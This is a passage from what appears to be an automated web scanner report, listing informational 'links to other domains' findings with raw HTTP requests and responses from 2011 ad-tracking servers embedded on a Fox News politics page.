Cookie: sess=1; icu=ChEIiXoQChgBIAEoATD_1IztBAoSCNyOARAKGAEgASgBMODnjO0EEODnjO0EGAE.; acb876294=-@L6DkI/7ZKqixK%64(.-(SIg?enc=MzMzMzMzwz9SuB6F61HAPwAAAMDMzPw_UrgehetRwD8zMzMzMzPDPxhpSwAC9Is_8f5MdWfsOnjgM6NNAAAAAMVYAwAdAgAAbAEAAAIAAACEbAIAk8AAAAEAAABVU0QAVVNEANgCWgBWHwAArQ8BAgUCAAUAAAAAUCHwvgAAAAA.&tt_code=1836970&udj=uf%28%27a%27%2C+8044%2C+1302541285%29%3Buf%28%27c%27%2C+43438%2C+1302541285%29%3Buf%28%27r%27%2C+158852%2C+1302541285%29%3Bppv%288484%2C+%274579021735584295192%27%2C+1302541285%2C+1303146085%2C+43438%2C+49299%29%3Bppv%288484%2C+%274579021735584295192%27%2C+1302541285%2C+1303146085%2C+43438%2C+49299%29%3B&cnd=!FRs_xwiu0wIQhNkJGAAgk4EDKAAxMzMzMzMzwz9CEwgAEAAYACABKP7__________wFCDQikQhClvU4YOyADKAVCDQikQhCktAgYBSACKAFIA1AAWNY-YABo7AI.; uuid2=8663496762294337265; anj=Kfu=8fG5+^E:3F.0s]#%2L_'x%SEV/i#-WZ!z6W0Jrx!wQ.y=fCzU_Fs2'gkKKA]$O/KPf+4#*[KxO?)Y+Ak9VRY_MNh'tM#U*cRYEl@2:-O`/[wF!*+([77te'#0GB_^*%p-G=(Y`j^:P![4#GOC0ScY4Jwaue1E-1EQ$(U65?I_<[c2-MxCu29ZR'!lUHN)-0<$VDu]IKM.kOO7].tJEH.9>4=13'iq:^cp/u%pqS!'zjghR!vJ

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 12-Apr-2011 17:11:19 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=8663496762294337265; path=/; expires=Sun, 10-Jul-2011 17:11:19 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb876294=; path=/; expires=Fri, 01-Jan-1980 00:00:00 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=8663496762294337265; path=/; expires=Sun, 10-Jul-2011 17:11:19 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=ChEIiXoQChgCIAIoAjC37IztBAoSCNyOARAKGAEgASgBMODnjO0EELfsjO0EGAI.; path=/; expires=Sun, 10-Jul-2011 17:11:19 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb423225=5_[r^kI/7Z6[kCcE/qX3J$Oik?enc=____fxSu8z9mZmamRbbxPwAAAKCZmQFAZmZmpkW28T8AAACAFK7zP8b5nD8EI09P8f5MdWfsOng3NqNNAAAAAMY5AwA3AQAAfAAAABkAAAChsAMAoVsAAAEAAABVU0QAVVNEANgCWgCqAQAAyggBAgUCAAUAAAAAJySMDgAAAAA.&tt_code=cm.foxnews&udj=updateSpendCreativeRecord%28198712%29&cnd=%7B%5C%22m6ClientId%5C%22:7197483837877830092,%5C%22transactionId%5C%22:12488499244399858,%5C%22marketerId%5C%22:803,%5C%22campaignId%5C%22:3502,%5C%22spendId%5C%22:29270,%5C%22spendWeight%5C%22:1230,%5C%22creativeId%5C%22:5780,%5C%22spendCreativeId%5C%22:198712,%5C%22adProfileId%5C%22:290%7D&custom_macro=NATIVE_SPEND_ID%5E29270%5ENATIVE_INVENTORY_ID%5E2677%5ENATIVE_SECTION_ID%5E56%5ENATIVE_PUBLISHER_ID%5E551%5ESOURCEURLENC%5Ehttp://collective-exchange.com%7CnotifyServer=asd141.sd.pl.pvt%7CnotifyPort=8080%7Cbid=1.2300000190734863%7CtId=12488499244399858%5EMEDIA6_DATA%5Efoo=bar; path=/; expires=Tue, 12-Apr-2011 17:11:19 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=8663496762294337265; path=/; expires=Sun, 10-Jul-2011 17:11:19 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG7DHE:3F.0s]#%2L_'x%SEV/i#-$J!z6W0Jrx!wQ.V#j3ObY5m*u3dTEH)U-!CnH%ij_4iN6VW%p2Y9bgzjq.G_8=%p/i)(Jz8WMaNXPrmLD4N(wOREnYe2x7$c4'2neswzJN:s*lyNP)1B_c=(g0OA*e6^R@`G^X$#oW*!b^J$.Nc5F$w'Wj8jw0_-7u-oqgU)d@IY4T6Pqj1!Y(b<VCl-wnmeMRAPasr@q5MvlBYdla=XKh8tlB`)M^; path=/; expires=Sun, 10-Jul-2011 17:11:19 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Mon, 11 Apr 2011 17:11:19 GMT
Content-Length: 374

document.write('<scr'+'ipt type="text/javascript"src="http://ad.doubleclick.net/adj/cm.foxnews/tier2_031010;net=cm;u=,cm-68330357_1302541877,11f3c48b4c0582b,none,ax.100;;cmw=owl;sz=728x90;net=cm;env=i
...[SNIP]...
</scr'+'ipt>');document.write('<img src="http://cm.g.doubleclick.net/pixel?nid=appnexus1" width="1" height="1"/>');
10.164. http://ib.adnxs.com/ptj  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ptj

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /ptj?member=311&inv_code=cm.foxnews&size=300x250&referrer=&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.foxnews%2Ftier2_031010%3Bnet%3Dcm%3Bu%3D%2Ccm-43636237_1302538879%2C11f3c48b4c0582b%2Cnone%2Cax.{PRICEBUCKET}%3B%3Bcmw%3Dowl%3Bsz%3D300x250%3Bnet%3Dcm%3Benv%3Difr%3Bord1%3D280882%3Bcontx%3Dnone%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3D%3Bord%3D1302538878%3F HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnews/300x250/politics-bottom?01AD=3dZ1qbCz91FPnjVHDJXbeA0jLtbKsNzTxEhbEx_A94nsZCfYiQf1UrA&01RI=90A4C54ACA8290D&01NA=&t=1302538875812&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: anj=Kfu=8fG4S]fQCe7?0P(*AuB-u**g1:XIF3ZUMbNTk^i4(0yHan$WRZ?dsg4U!.GQv!b=rS4vsHr#5hLUHfpwcPki/)#5j#QOVB/1X?`d/Lh<E'Cm2t/WTA]'`kG3]ocdCcrW'<%^Ue4vP!!5ch.vajEL)BV[>#vXU'Dqt8H!mBfnMp/NHg8A3Ndz!g8cZwEc(wVe4[.3A2tr=lb)p#*Xc02Og?@'f9fL9.O3]'UWJ-No-vqc^97BbwdN:A>`PTQ'knJh9yhU$; sess=1; uuid2=8663496762294337265

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Tue, 12-Apr-2011 16:21:20 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=8663496762294337265; path=/; expires=Sun, 10-Jul-2011 16:21:20 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=8663496762294337265; path=/; expires=Sun, 10-Jul-2011 16:21:20 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=ChEIiXoQChgBIAEoATCA1YztBBCA1YztBBgA; path=/; expires=Sun, 10-Jul-2011 16:21:20 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb398454=5_[r^208WM6[kCcE/qX3bMO`R?enc=____fxSu8z9mZmamRbbxPwAAAKCZmQFAZmZmpkW28T8AAACAFK7zPx24drqSYZEH8f5MdWfsOniAKqNNAAAAAMY5AwA3AQAAfAAAABkAAACfsAMAoVsAAAEAAABVU0QAVVNEACwB-gCqAQAAzAgBAgUCAAUAAAAAiCTPKQAAAAA.&tt_code=cm.foxnews&udj=updateSpendCreativeRecord%28198711%29&cnd=%7B%5C%22m6ClientId%5C%22:7197483837877830092,%5C%22transactionId%5C%22:12086094899865865,%5C%22marketerId%5C%22:803,%5C%22campaignId%5C%22:3502,%5C%22spendId%5C%22:29270,%5C%22spendWeight%5C%22:1230,%5C%22creativeId%5C%22:5778,%5C%22spendCreativeId%5C%22:198711,%5C%22adProfileId%5C%22:290%7D&custom_macro=NATIVE_SPEND_ID%5E29270%5ENATIVE_INVENTORY_ID%5E2677%5ENATIVE_SECTION_ID%5E56%5ENATIVE_PUBLISHER_ID%5E551%5ESOURCEURLENC%5Ehttp://collective-exchange.com%7CnotifyServer=asd106.sd.pl.pvt%7CnotifyPort=8080%7Cbid=1.2300000190734863%7CtId=12086094899865865%5EMEDIA6_DATA%5Efoo=bar; path=/; expires=Tue, 12-Apr-2011 16:21:20 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=8663496762294337265; path=/; expires=Sun, 10-Jul-2011 16:21:20 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG68%E:3F.0s]#%2L_'x%SEV/i#+L9!z6W0Jrx!wQ.y=fCzU_Fs2'gkKKA]$O/KPf+4#*[KxO?)Y+Ak9VRY_MNh'tM#U*cRYEl@2:-O`/[wF!*+([77te'#0GB_^*%p-G=(Y`j^:P![4#GOC0ScY4Jwaue1E-1EQ$(U65?I_<[c2-MxCu29ZR'!lUHN)-0<$VDu]IKM.kOO7].tJEH.9>4=0r(J`qtK'J; path=/; expires=Sun, 10-Jul-2011 16:21:20 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Mon, 11 Apr 2011 16:21:20 GMT
Content-Length: 493

document.write('<scr'+'ipt type="text/javascript"src="http://ad.doubleclick.net/adj/cm.foxnews/tier2_031010;net=cm;u=,cm-43636237_1302538879,11f3c48b4c0582b,none,ax.100;;cmw=owl;sz=300x250;net=cm;env=
...[SNIP]...
</scr'+'ipt>');document.write('<iframe src="http://view.atdmt.com/iaction/adoapn_AppNexusDemoActionTag_1" width="1" height="1" frameborder="0" scrolling="No" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0"></iframe>
...[SNIP]...
10.165. http://insight.adsrvr.org/track/conv  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://insight.adsrvr.org
Path:   /track/conv

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /track/conv?pid=2ktjv7m&ct=0:ACQ_site&v=0&vf=USD&adv=7j9i29e&fmt=3 HTTP/1.1
Host: insight.adsrvr.org
Proxy-Connection: keep-alive
Referer: http://ad.adsrvr.org/container/7j9i29e.1.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Cache-Control: private,no-cache, must-revalidate
Content-Type: text/html; charset=utf-8
Date: Sat, 09 Apr 2011 00:18:41 GMT
Location: //cm.g.doubleclick.net/pixel?nid=TheTradeDesk
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV"
Pragma: no-cache
Server: Microsoft-IIS/7.0
Set-Cookie: TDID=93caf860-6015-49f5-b797-e053c6c1f790; domain=.adsrvr.org; expires=Mon, 09-Apr-2012 00:18:41 GMT; path=/
X-AspNet-Version: 4.0.30319
Connection: keep-alive
Content-Length: 75

<img src="//cm.g.doubleclick.net/pixel?nid=TheTradeDesk" height=1 width=1/>
10.166. http://pixel.invitemedia.com/admeld_sync  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.invitemedia.com
Path:   /admeld_sync

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /admeld_sync?admeld_user_id=e36a2f20-9985-4dcd-82e9-6ff0312e024e&admeld_adprovider_id=300&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: pixel.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnews/300x250/politics-bottom?t=1302539475030&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: partnerUID="eyI3OSI6IFsiNmNmN2Q2MjlkMzc5MWVlNjRhY2IyNzFkMGJiMTJkMzEiLCB0cnVlXX0="; exchange_uid=eyIyIjogWyI4NjYzNDk2NzYyMjk0MzM3MjY1IiwgNzM0MjM2XSwgIjQiOiBbIkNBRVNFS09ONkpueXZ2TWVsby1xbklGLTVmVSIsIDczNDIyOV19; uid=dcb84907-869e-4e7d-baf7-9761469e8965; segments_p1=eJzjYuF4vJaJi5mjMYKLheN5PyOQfDyBEShwkgNINEUAiX8g1n8fILGRAwAJqArM

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 11 Apr 2011 16:31:18 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Mon, 11-Apr-2011 16:30:58 GMT
Content-Type: text/javascript
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 271

document.write('<img width="0" height="0" src="http://tag.admeld.com/match?admeld_adprovider_id=300&external_user_id=dcb84907-869e-4e7d-baf7-9761469e8965&Expiration=1302971478&custom_user_segments=%2C11265%2C11266%2C18531%2C18407%2C1097%2C1073%2C38627%2C1150%2C9855"/>');
10.167. http://provideby.com/show_dynamic/coupon/livingsocial-fnews/300x250-POL/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://provideby.com
Path:   /show_dynamic/coupon/livingsocial-fnews/300x250-POL/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /show_dynamic/coupon/livingsocial-fnews/300x250-POL/?id=afnews-clivsoc-dPOL-d{tag} HTTP/1.1
Host: provideby.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 11 Apr 2011 16:21:18 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.11
Set-Cookie: ci_session=a%3A4%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%224ec8615c3ace6c9a944fc11de1740a4c%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A15%3A%22173.193.214.243%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A50%3A%22Mozilla%2F5.0+%28Windows%3B+U%3B+Windows+NT+6.1%3B+en-US%29+Ap%22%3Bs%3A13%3A%22last_activity%22%3Bs%3A10%3A%221302538878%22%3B%7De13844e155931755d00e16098861691d; expires=Mon, 11-Apr-2011 18:21:18 GMT; path=/
Content-Length: 1110
Connection: close
Content-Type: text/html; charset=UTF-8


<html><head><title>AdServer</title><style>html, body, div, span, applet, object, iframe, h1, h2, h3, h4, h5, h6, p, blockquote, pre,a, abbr, acronym, address, big, cite, code, del, dfn, em, fo
...[SNIP]...
<body>
<a href="http://safecheckpoint.net/tracking/jumplink/index/?j=46ksJO&subid=afnews-clivsoc-g300POL-dburger2" border="0" alt="AdServer" target="_blank"><img src="http://static.provideby.com/data/storage/dynamic/cache/dallas/300x250-livingsocial-burger2--dallas.jpg">
...[SNIP]...
10.168. http://tag.admeld.com/ad/iframe/3/foxnews/300x250/politics-bottom  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/iframe/3/foxnews/300x250/politics-bottom

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /ad/iframe/3/foxnews/300x250/politics-bottom?01AD=3dZ1qbCz91FPnjVHDJXbeA0jLtbKsNzTxEhbEx_A94nsZCfYiQf1UrA&01RI=90A4C54ACA8290D&01NA=&t=1302538875812&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meld_sess=e36a2f20-9985-4dcd-82e9-6ff0312e024e; D41U=CT-1

Response

HTTP/1.1 200 OK
Server: Apache
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
X-AdMeld-Debug: eyB0eXBlOiAgICAgICAgICJtZWxkIiwgIHB1YjogICAgICAgICAgMywgIHNpdGU6ICAgICAgICAgImZveG5ld3MiLCAgYWQ6ICAgICAgICAgICAzMTM4NzI1LCAgbmV0d29yazogICAgICAiYWRjb20iLCAgc2l6ZTogICAgICAgICAiMzAweDI1MCIsICBmcmVxOiAgICAgICAgICIxLTQiLCAgZGVmYXVsdHM6ICAgICAiMC0wIiwgIHJlcXVlc3Q6ICAgICAgIjZjNGUxYjNjLThhZDItNDlhNi1hZGE2LTU4ZTgwOTYwNDhkZSIsICB1c2VyOiAgICAgICAgICJlMzZhMmYyMC05OTg1LTRkY2QtODJlOS02ZmYwMzEyZTAyNGUiLCAgY291bnRyeTogICAgICAiVVMiLCAgY2l0eTogICAgICAgICAiRGFsbGFzIiwgIGRtYTogICAgICAgICAgNjIzLCAgcmVnaW9uOiAgICAgICAiVFgiLCAgaXA6ICAgICAgICAgICAiMTczLjE5My4yMTQuMjQzIiwgIGRlcHRoOiAgICAgICAgMSwgIHRhcmdldDogICAgICAgInBvbGl0aWNzLWJvdHRvbSIsICBkaXY6ICAgICAgICAgICI2YzRlMWIzYy04YWQyLTQ5YTYtYWRhNi01OGU4MDk2MDQ4ZGUiLCAgdXJsOiAgICAgICAgICAiaHR0cDovL3d3dy5mb3huZXdzLmNvbS9wb2xpdGljcy9pbmRleC5odG1sIiwgIGVsYXBzZWQ6ICAgICAgMCwgIGRlY2lzaW9uOiAgICAgImFkIiwgIGltcDogICAgICAgICAgNSwgIG5ldHdvcmtfaWQ6ICAgMSwgIGFjY291bnRfaWQ6ICAgMTMsICBuZXR3b3JrX25hbWU6ICJBZHZlcnRpc2luZy5jb20iLCAgcHVibGlzaGVyX25hbWU6ICJmb3huZXdzIiwgIGVjcG06ICAgICAgICAgIjAuODYiLCAgZmVjcG06ICAgICAgICAiMC44NiIsICBmaWxsOiAgICAgICAgICI0NS41MCIsICBwbGFjZW1lbnQ6ICAgICJwb2xpdGljcy1ib3R0b20iLCAgcnVsZTogICAgICAgICAicG9saXRpY3MtYm90dG9tIiwgIGNyZWF0aXZlX2lkOiAgIiIsICBiaWRkZXJzOiAgICAgIFt7Im5ldHdvcmtfbmFtZSI6Ik1heFBvaW50IEludGVyYWN0aXZlIChSVEIpIiwgImJpZCI6IjAuMDAiLCJhZCI6NjMwNDksICJidXkiOjE3NiwibHAiOiIiLCJhbiI6IiIsInN0YXR1cyI6Im5vIGJpZCIsImZpZCI6MCwgImZjcG0iOiIwLjAwIn0seyJuZXR3b3JrX25hbWUiOiJNZWRpYU1hdGggKFJUQikiLCAiYmlkIjoiMC4wMCIsImFkIjoxOTcxODEsICJidXkiOjUwMywibHAiOiIiLCJhbiI6IiIsInN0YXR1cyI6Im5vIGJpZCIsImZpZCI6MCwgImZjcG0iOiIwLjAwIn0seyJuZXR3b3JrX25hbWUiOiJ4KzEgKFJUQikiLCAiYmlkIjoiMC4wMCIsImFkIjoxMTc4MTUsICJidXkiOjkwMCwibHAiOiIiLCJhbiI6IiIsInN0YXR1cyI6Im5vIHJlc3BvbnNlIiwiZmlkIjowLCAiZmNwbSI6IjAuMDAifSx7Im5ldHdvcmtfbmFtZSI6Ik1lZGlhNiBEZWdyZWVzIChSVEIpIiwgImJpZCI6IjAuMDAiLCJhZCI6MjE0MTA3OSwgImJ1eSI6MzMxMSwibHAiOiJodHRwOi8vd3d3LnZpcmdpbmFtZXJpY2EuY29tL3Z4L2Jvb2tpbmcvZXhpdC1oYXBwaWVyP2NpZD1kaXNfMDAwNzYiLCJhbiI6IiIsInN0YXR1cyI6IjEuMjMgTiIsImZpZCI6NDg5MiwgImZjcG0iOiIxLjc1In0seyJuZXR3b3JrX25hbWUiOiJUdWJlbW9ndWwgKFJUQikiLCAiYmlkIjoiMC4wMCIsImFkIjo1ODk1ODA4LCAiYnV5Ijo4NDcxLCJscCI6IiIsImFuIjoiIiwic3RhdHVzIjoibm8gYmlkIiwiZmlkIjowLCAiZmNwbSI6IjAuMDAifSx7Im5ldHdvcmtfbmFtZSI6IlR1cm4gKFJUQikiLCAiYmlkIjoiMC4wMCIsImFkIjo2Mjg5NywgImJ1eSI6MTg5LCJscCI6Imh0dHA6Ly93ZWxjb21lLmhwLmNvbS9jb3VudHJ5L3VzL2VuL2NzL2hvbWVfYy5odG1sIiwiYW4iOiJIUCBEaXJlY3QiLCJzdGF0dXMiOiIwLjEyIiwiZmlkIjo0ODkyLCAiZmNwbSI6IjEuNzUifSx7Im5ldHdvcmtfbmFtZSI6IkRhdGFYdSAoUlRCKSIsICJiaWQiOiIwLjAwIiwiYWQiOjYyOTc5LCAiYnV5IjoxOTksImxwIjoiIiwiYW4iOiIiLCJzdGF0dXMiOiJubyBiaWQiLCJmaWQiOjAsICJmY3BtIjoiMC4wMCJ9XSwgIHRhcmdldGluZzogICAgIiIsICBhZHZlcnRpc2VyOiAgICAiIiwgIGxhbmRpbmdfcGFnZTogICAgIiIsICBob3N0OiAgICAgICAgICJuai10YWcxMiJ9
Content-Length: 1629
Content-Type: text/html
Date: Mon, 11 Apr 2011 16:21:19 GMT
Connection: close
Set-Cookie: D41U=3dZ1qbCz91FPnjVHDJXbeA0jLtbKsNzTxEhbEx_A94nsZCfYiQf1UrA; expires=Mon, 09-May-2011 16:21:19 GMT; path=/; domain=.tag.admeld.com
P3P: CP="DSP NOI ADM PSAo PSDo OUR BUS NAV COM UNI INT"

<html>
<body bgcolor="#ffffff" style="margin:0;padding:0">


<div style="width:px;height:px;margin:0;border:0">


<s
...[SNIP]...
<div style="width:0;height:0">


<script type="text/javascript" src="http://adserver.veruta.com/cookiematch.fcgi?pnid=3000003&admeld_user_id=e36a2f20-9985-4dcd-82e9-6ff0312e024e&admeld_adprovider_id=567&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match"></script>

<img width="0" height="0" src="http://tags.bluekai.com/site/3561?id=e36a2f20-9985-4dcd-82e9-6ff0312e024e&redir=http%3A%2F%2Ftag.admeld.com%2Fpixel%3Fadmeld_dataprovider_id%3D21%26external_user_id%3D%24BK_UUID%26_m%3D1&admeld_user_id=e36a2f20-9985-4dcd-82e9-6ff0312e024e&admeld_dataprovider_id=21&admeld_callback=http://tag.admeld.com/pixel"/>

<script type="text/javascript" src="http://bh.contextweb.com/bh/sync/admeld?admeld_user_id=e36a2f20-9985-4dcd-82e9-6ff0312e024e&admeld_adprovider_id=8&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match"></script>
...[SNIP]...
10.169. http://tag.admeld.com/ad/iframe/3/foxnews/300x250/politics-bottom  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tag.admeld.com
Path:   /ad/iframe/3/foxnews/300x250/politics-bottom

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /ad/iframe/3/foxnews/300x250/politics-bottom?t=1302539475030&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meld_sess=e36a2f20-9985-4dcd-82e9-6ff0312e024e; D41U=3dZ1qbCz91FPnjVHDJXbeA0jLtbKsNzTxEhbEx_A94nsZCfYiQf1UrA

Response

HTTP/1.1 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="DEVo PSDo OUR BUS DSP ALL COR"
Pragma: no-cache
Cache-Control: no-store
Expires: Mon, 26 Jul 1997 05:00:00 GMT
X-AdMeld-Debug: eyB0eXBlOiAgICAgICAgICJtZWxkIiwgIHB1YjogICAgICAgICAgMywgIHNpdGU6ICAgICAgICAgImZveG5ld3MiLCAgYWQ6ICAgICAgICAgICAzMTM4NzI2LCAgbmV0d29yazogICAgICAiYWRjb20iLCAgc2l6ZTogICAgICAgICAiMzAweDI1MCIsICBmcmVxOiAgICAgICAgICI3LTciLCAgZGVmYXVsdHM6ICAgICAiMC0wIiwgIHJlcXVlc3Q6ICAgICAgIjUxYjdmZDUwLTc0ZGEtNDU0NS04OGU4LTFlMzBjNDEyOTUwZiIsICB1c2VyOiAgICAgICAgICJlMzZhMmYyMC05OTg1LTRkY2QtODJlOS02ZmYwMzEyZTAyNGUiLCAgY291bnRyeTogICAgICAiVVMiLCAgY2l0eTogICAgICAgICAiRGFsbGFzIiwgIGRtYTogICAgICAgICAgNjIzLCAgcmVnaW9uOiAgICAgICAiVFgiLCAgaXA6ICAgICAgICAgICAiMTczLjE5My4yMTQuMjQzIiwgIGRlcHRoOiAgICAgICAgMSwgIHRhcmdldDogICAgICAgInBvbGl0aWNzLWJvdHRvbSIsICBkaXY6ICAgICAgICAgICI1MWI3ZmQ1MC03NGRhLTQ1NDUtODhlOC0xZTMwYzQxMjk1MGYiLCAgdXJsOiAgICAgICAgICAiaHR0cDovL3d3dy5mb3huZXdzLmNvbS9wb2xpdGljcy9pbmRleC5odG1sIiwgIGVsYXBzZWQ6ICAgICAgMCwgIGRlY2lzaW9uOiAgICAgImFkIiwgIGltcDogICAgICAgICAgNTYsICBuZXR3b3JrX2lkOiAgIDEsICBhY2NvdW50X2lkOiAgIDEzLCAgbmV0d29ya19uYW1lOiAiQWR2ZXJ0aXNpbmcuY29tIiwgIHB1Ymxpc2hlcl9uYW1lOiAiZm94bmV3cyIsICBlY3BtOiAgICAgICAgICIwLjUyIiwgIGZlY3BtOiAgICAgICAgIjAuNTIiLCAgZmlsbDogICAgICAgICAiMTAuMDEiLCAgcGxhY2VtZW50OiAgICAicG9saXRpY3MtYm90dG9tIiwgIHJ1bGU6ICAgICAgICAgInBvbGl0aWNzLWJvdHRvbSIsICBjcmVhdGl2ZV9pZDogICIiLCAgYmlkZGVyczogICAgICBbeyJuZXR3b3JrX25hbWUiOiJBcHBOZXh1cyAoUlRCKSIsICJiaWQiOiIwLjAwIiwiYWQiOjYyOTY3LCAiYnV5IjoxMTEsImxwIjoiaHR0cDovL2hvbWVkb2xsYXJzLm5ldCIsImFuIjoiIiwic3RhdHVzIjoiMS40MSBOIiwiZmlkIjo1MDgsICJmY3BtIjoiMi4yNSJ9LHsibmV0d29ya19uYW1lIjoiTWF4UG9pbnQgSW50ZXJhY3RpdmUgKFJUQikiLCAiYmlkIjoiMC4wMCIsImFkIjo2MzA0OSwgImJ1eSI6MTc2LCJscCI6IiIsImFuIjoiIiwic3RhdHVzIjoibm8gYmlkIiwiZmlkIjowLCAiZmNwbSI6IjAuMDAifSx7Im5ldHdvcmtfbmFtZSI6IkRhdGFYdSAoUlRCKSIsICJiaWQiOiIwLjAwIiwiYWQiOjYyOTc5LCAiYnV5IjoxOTksImxw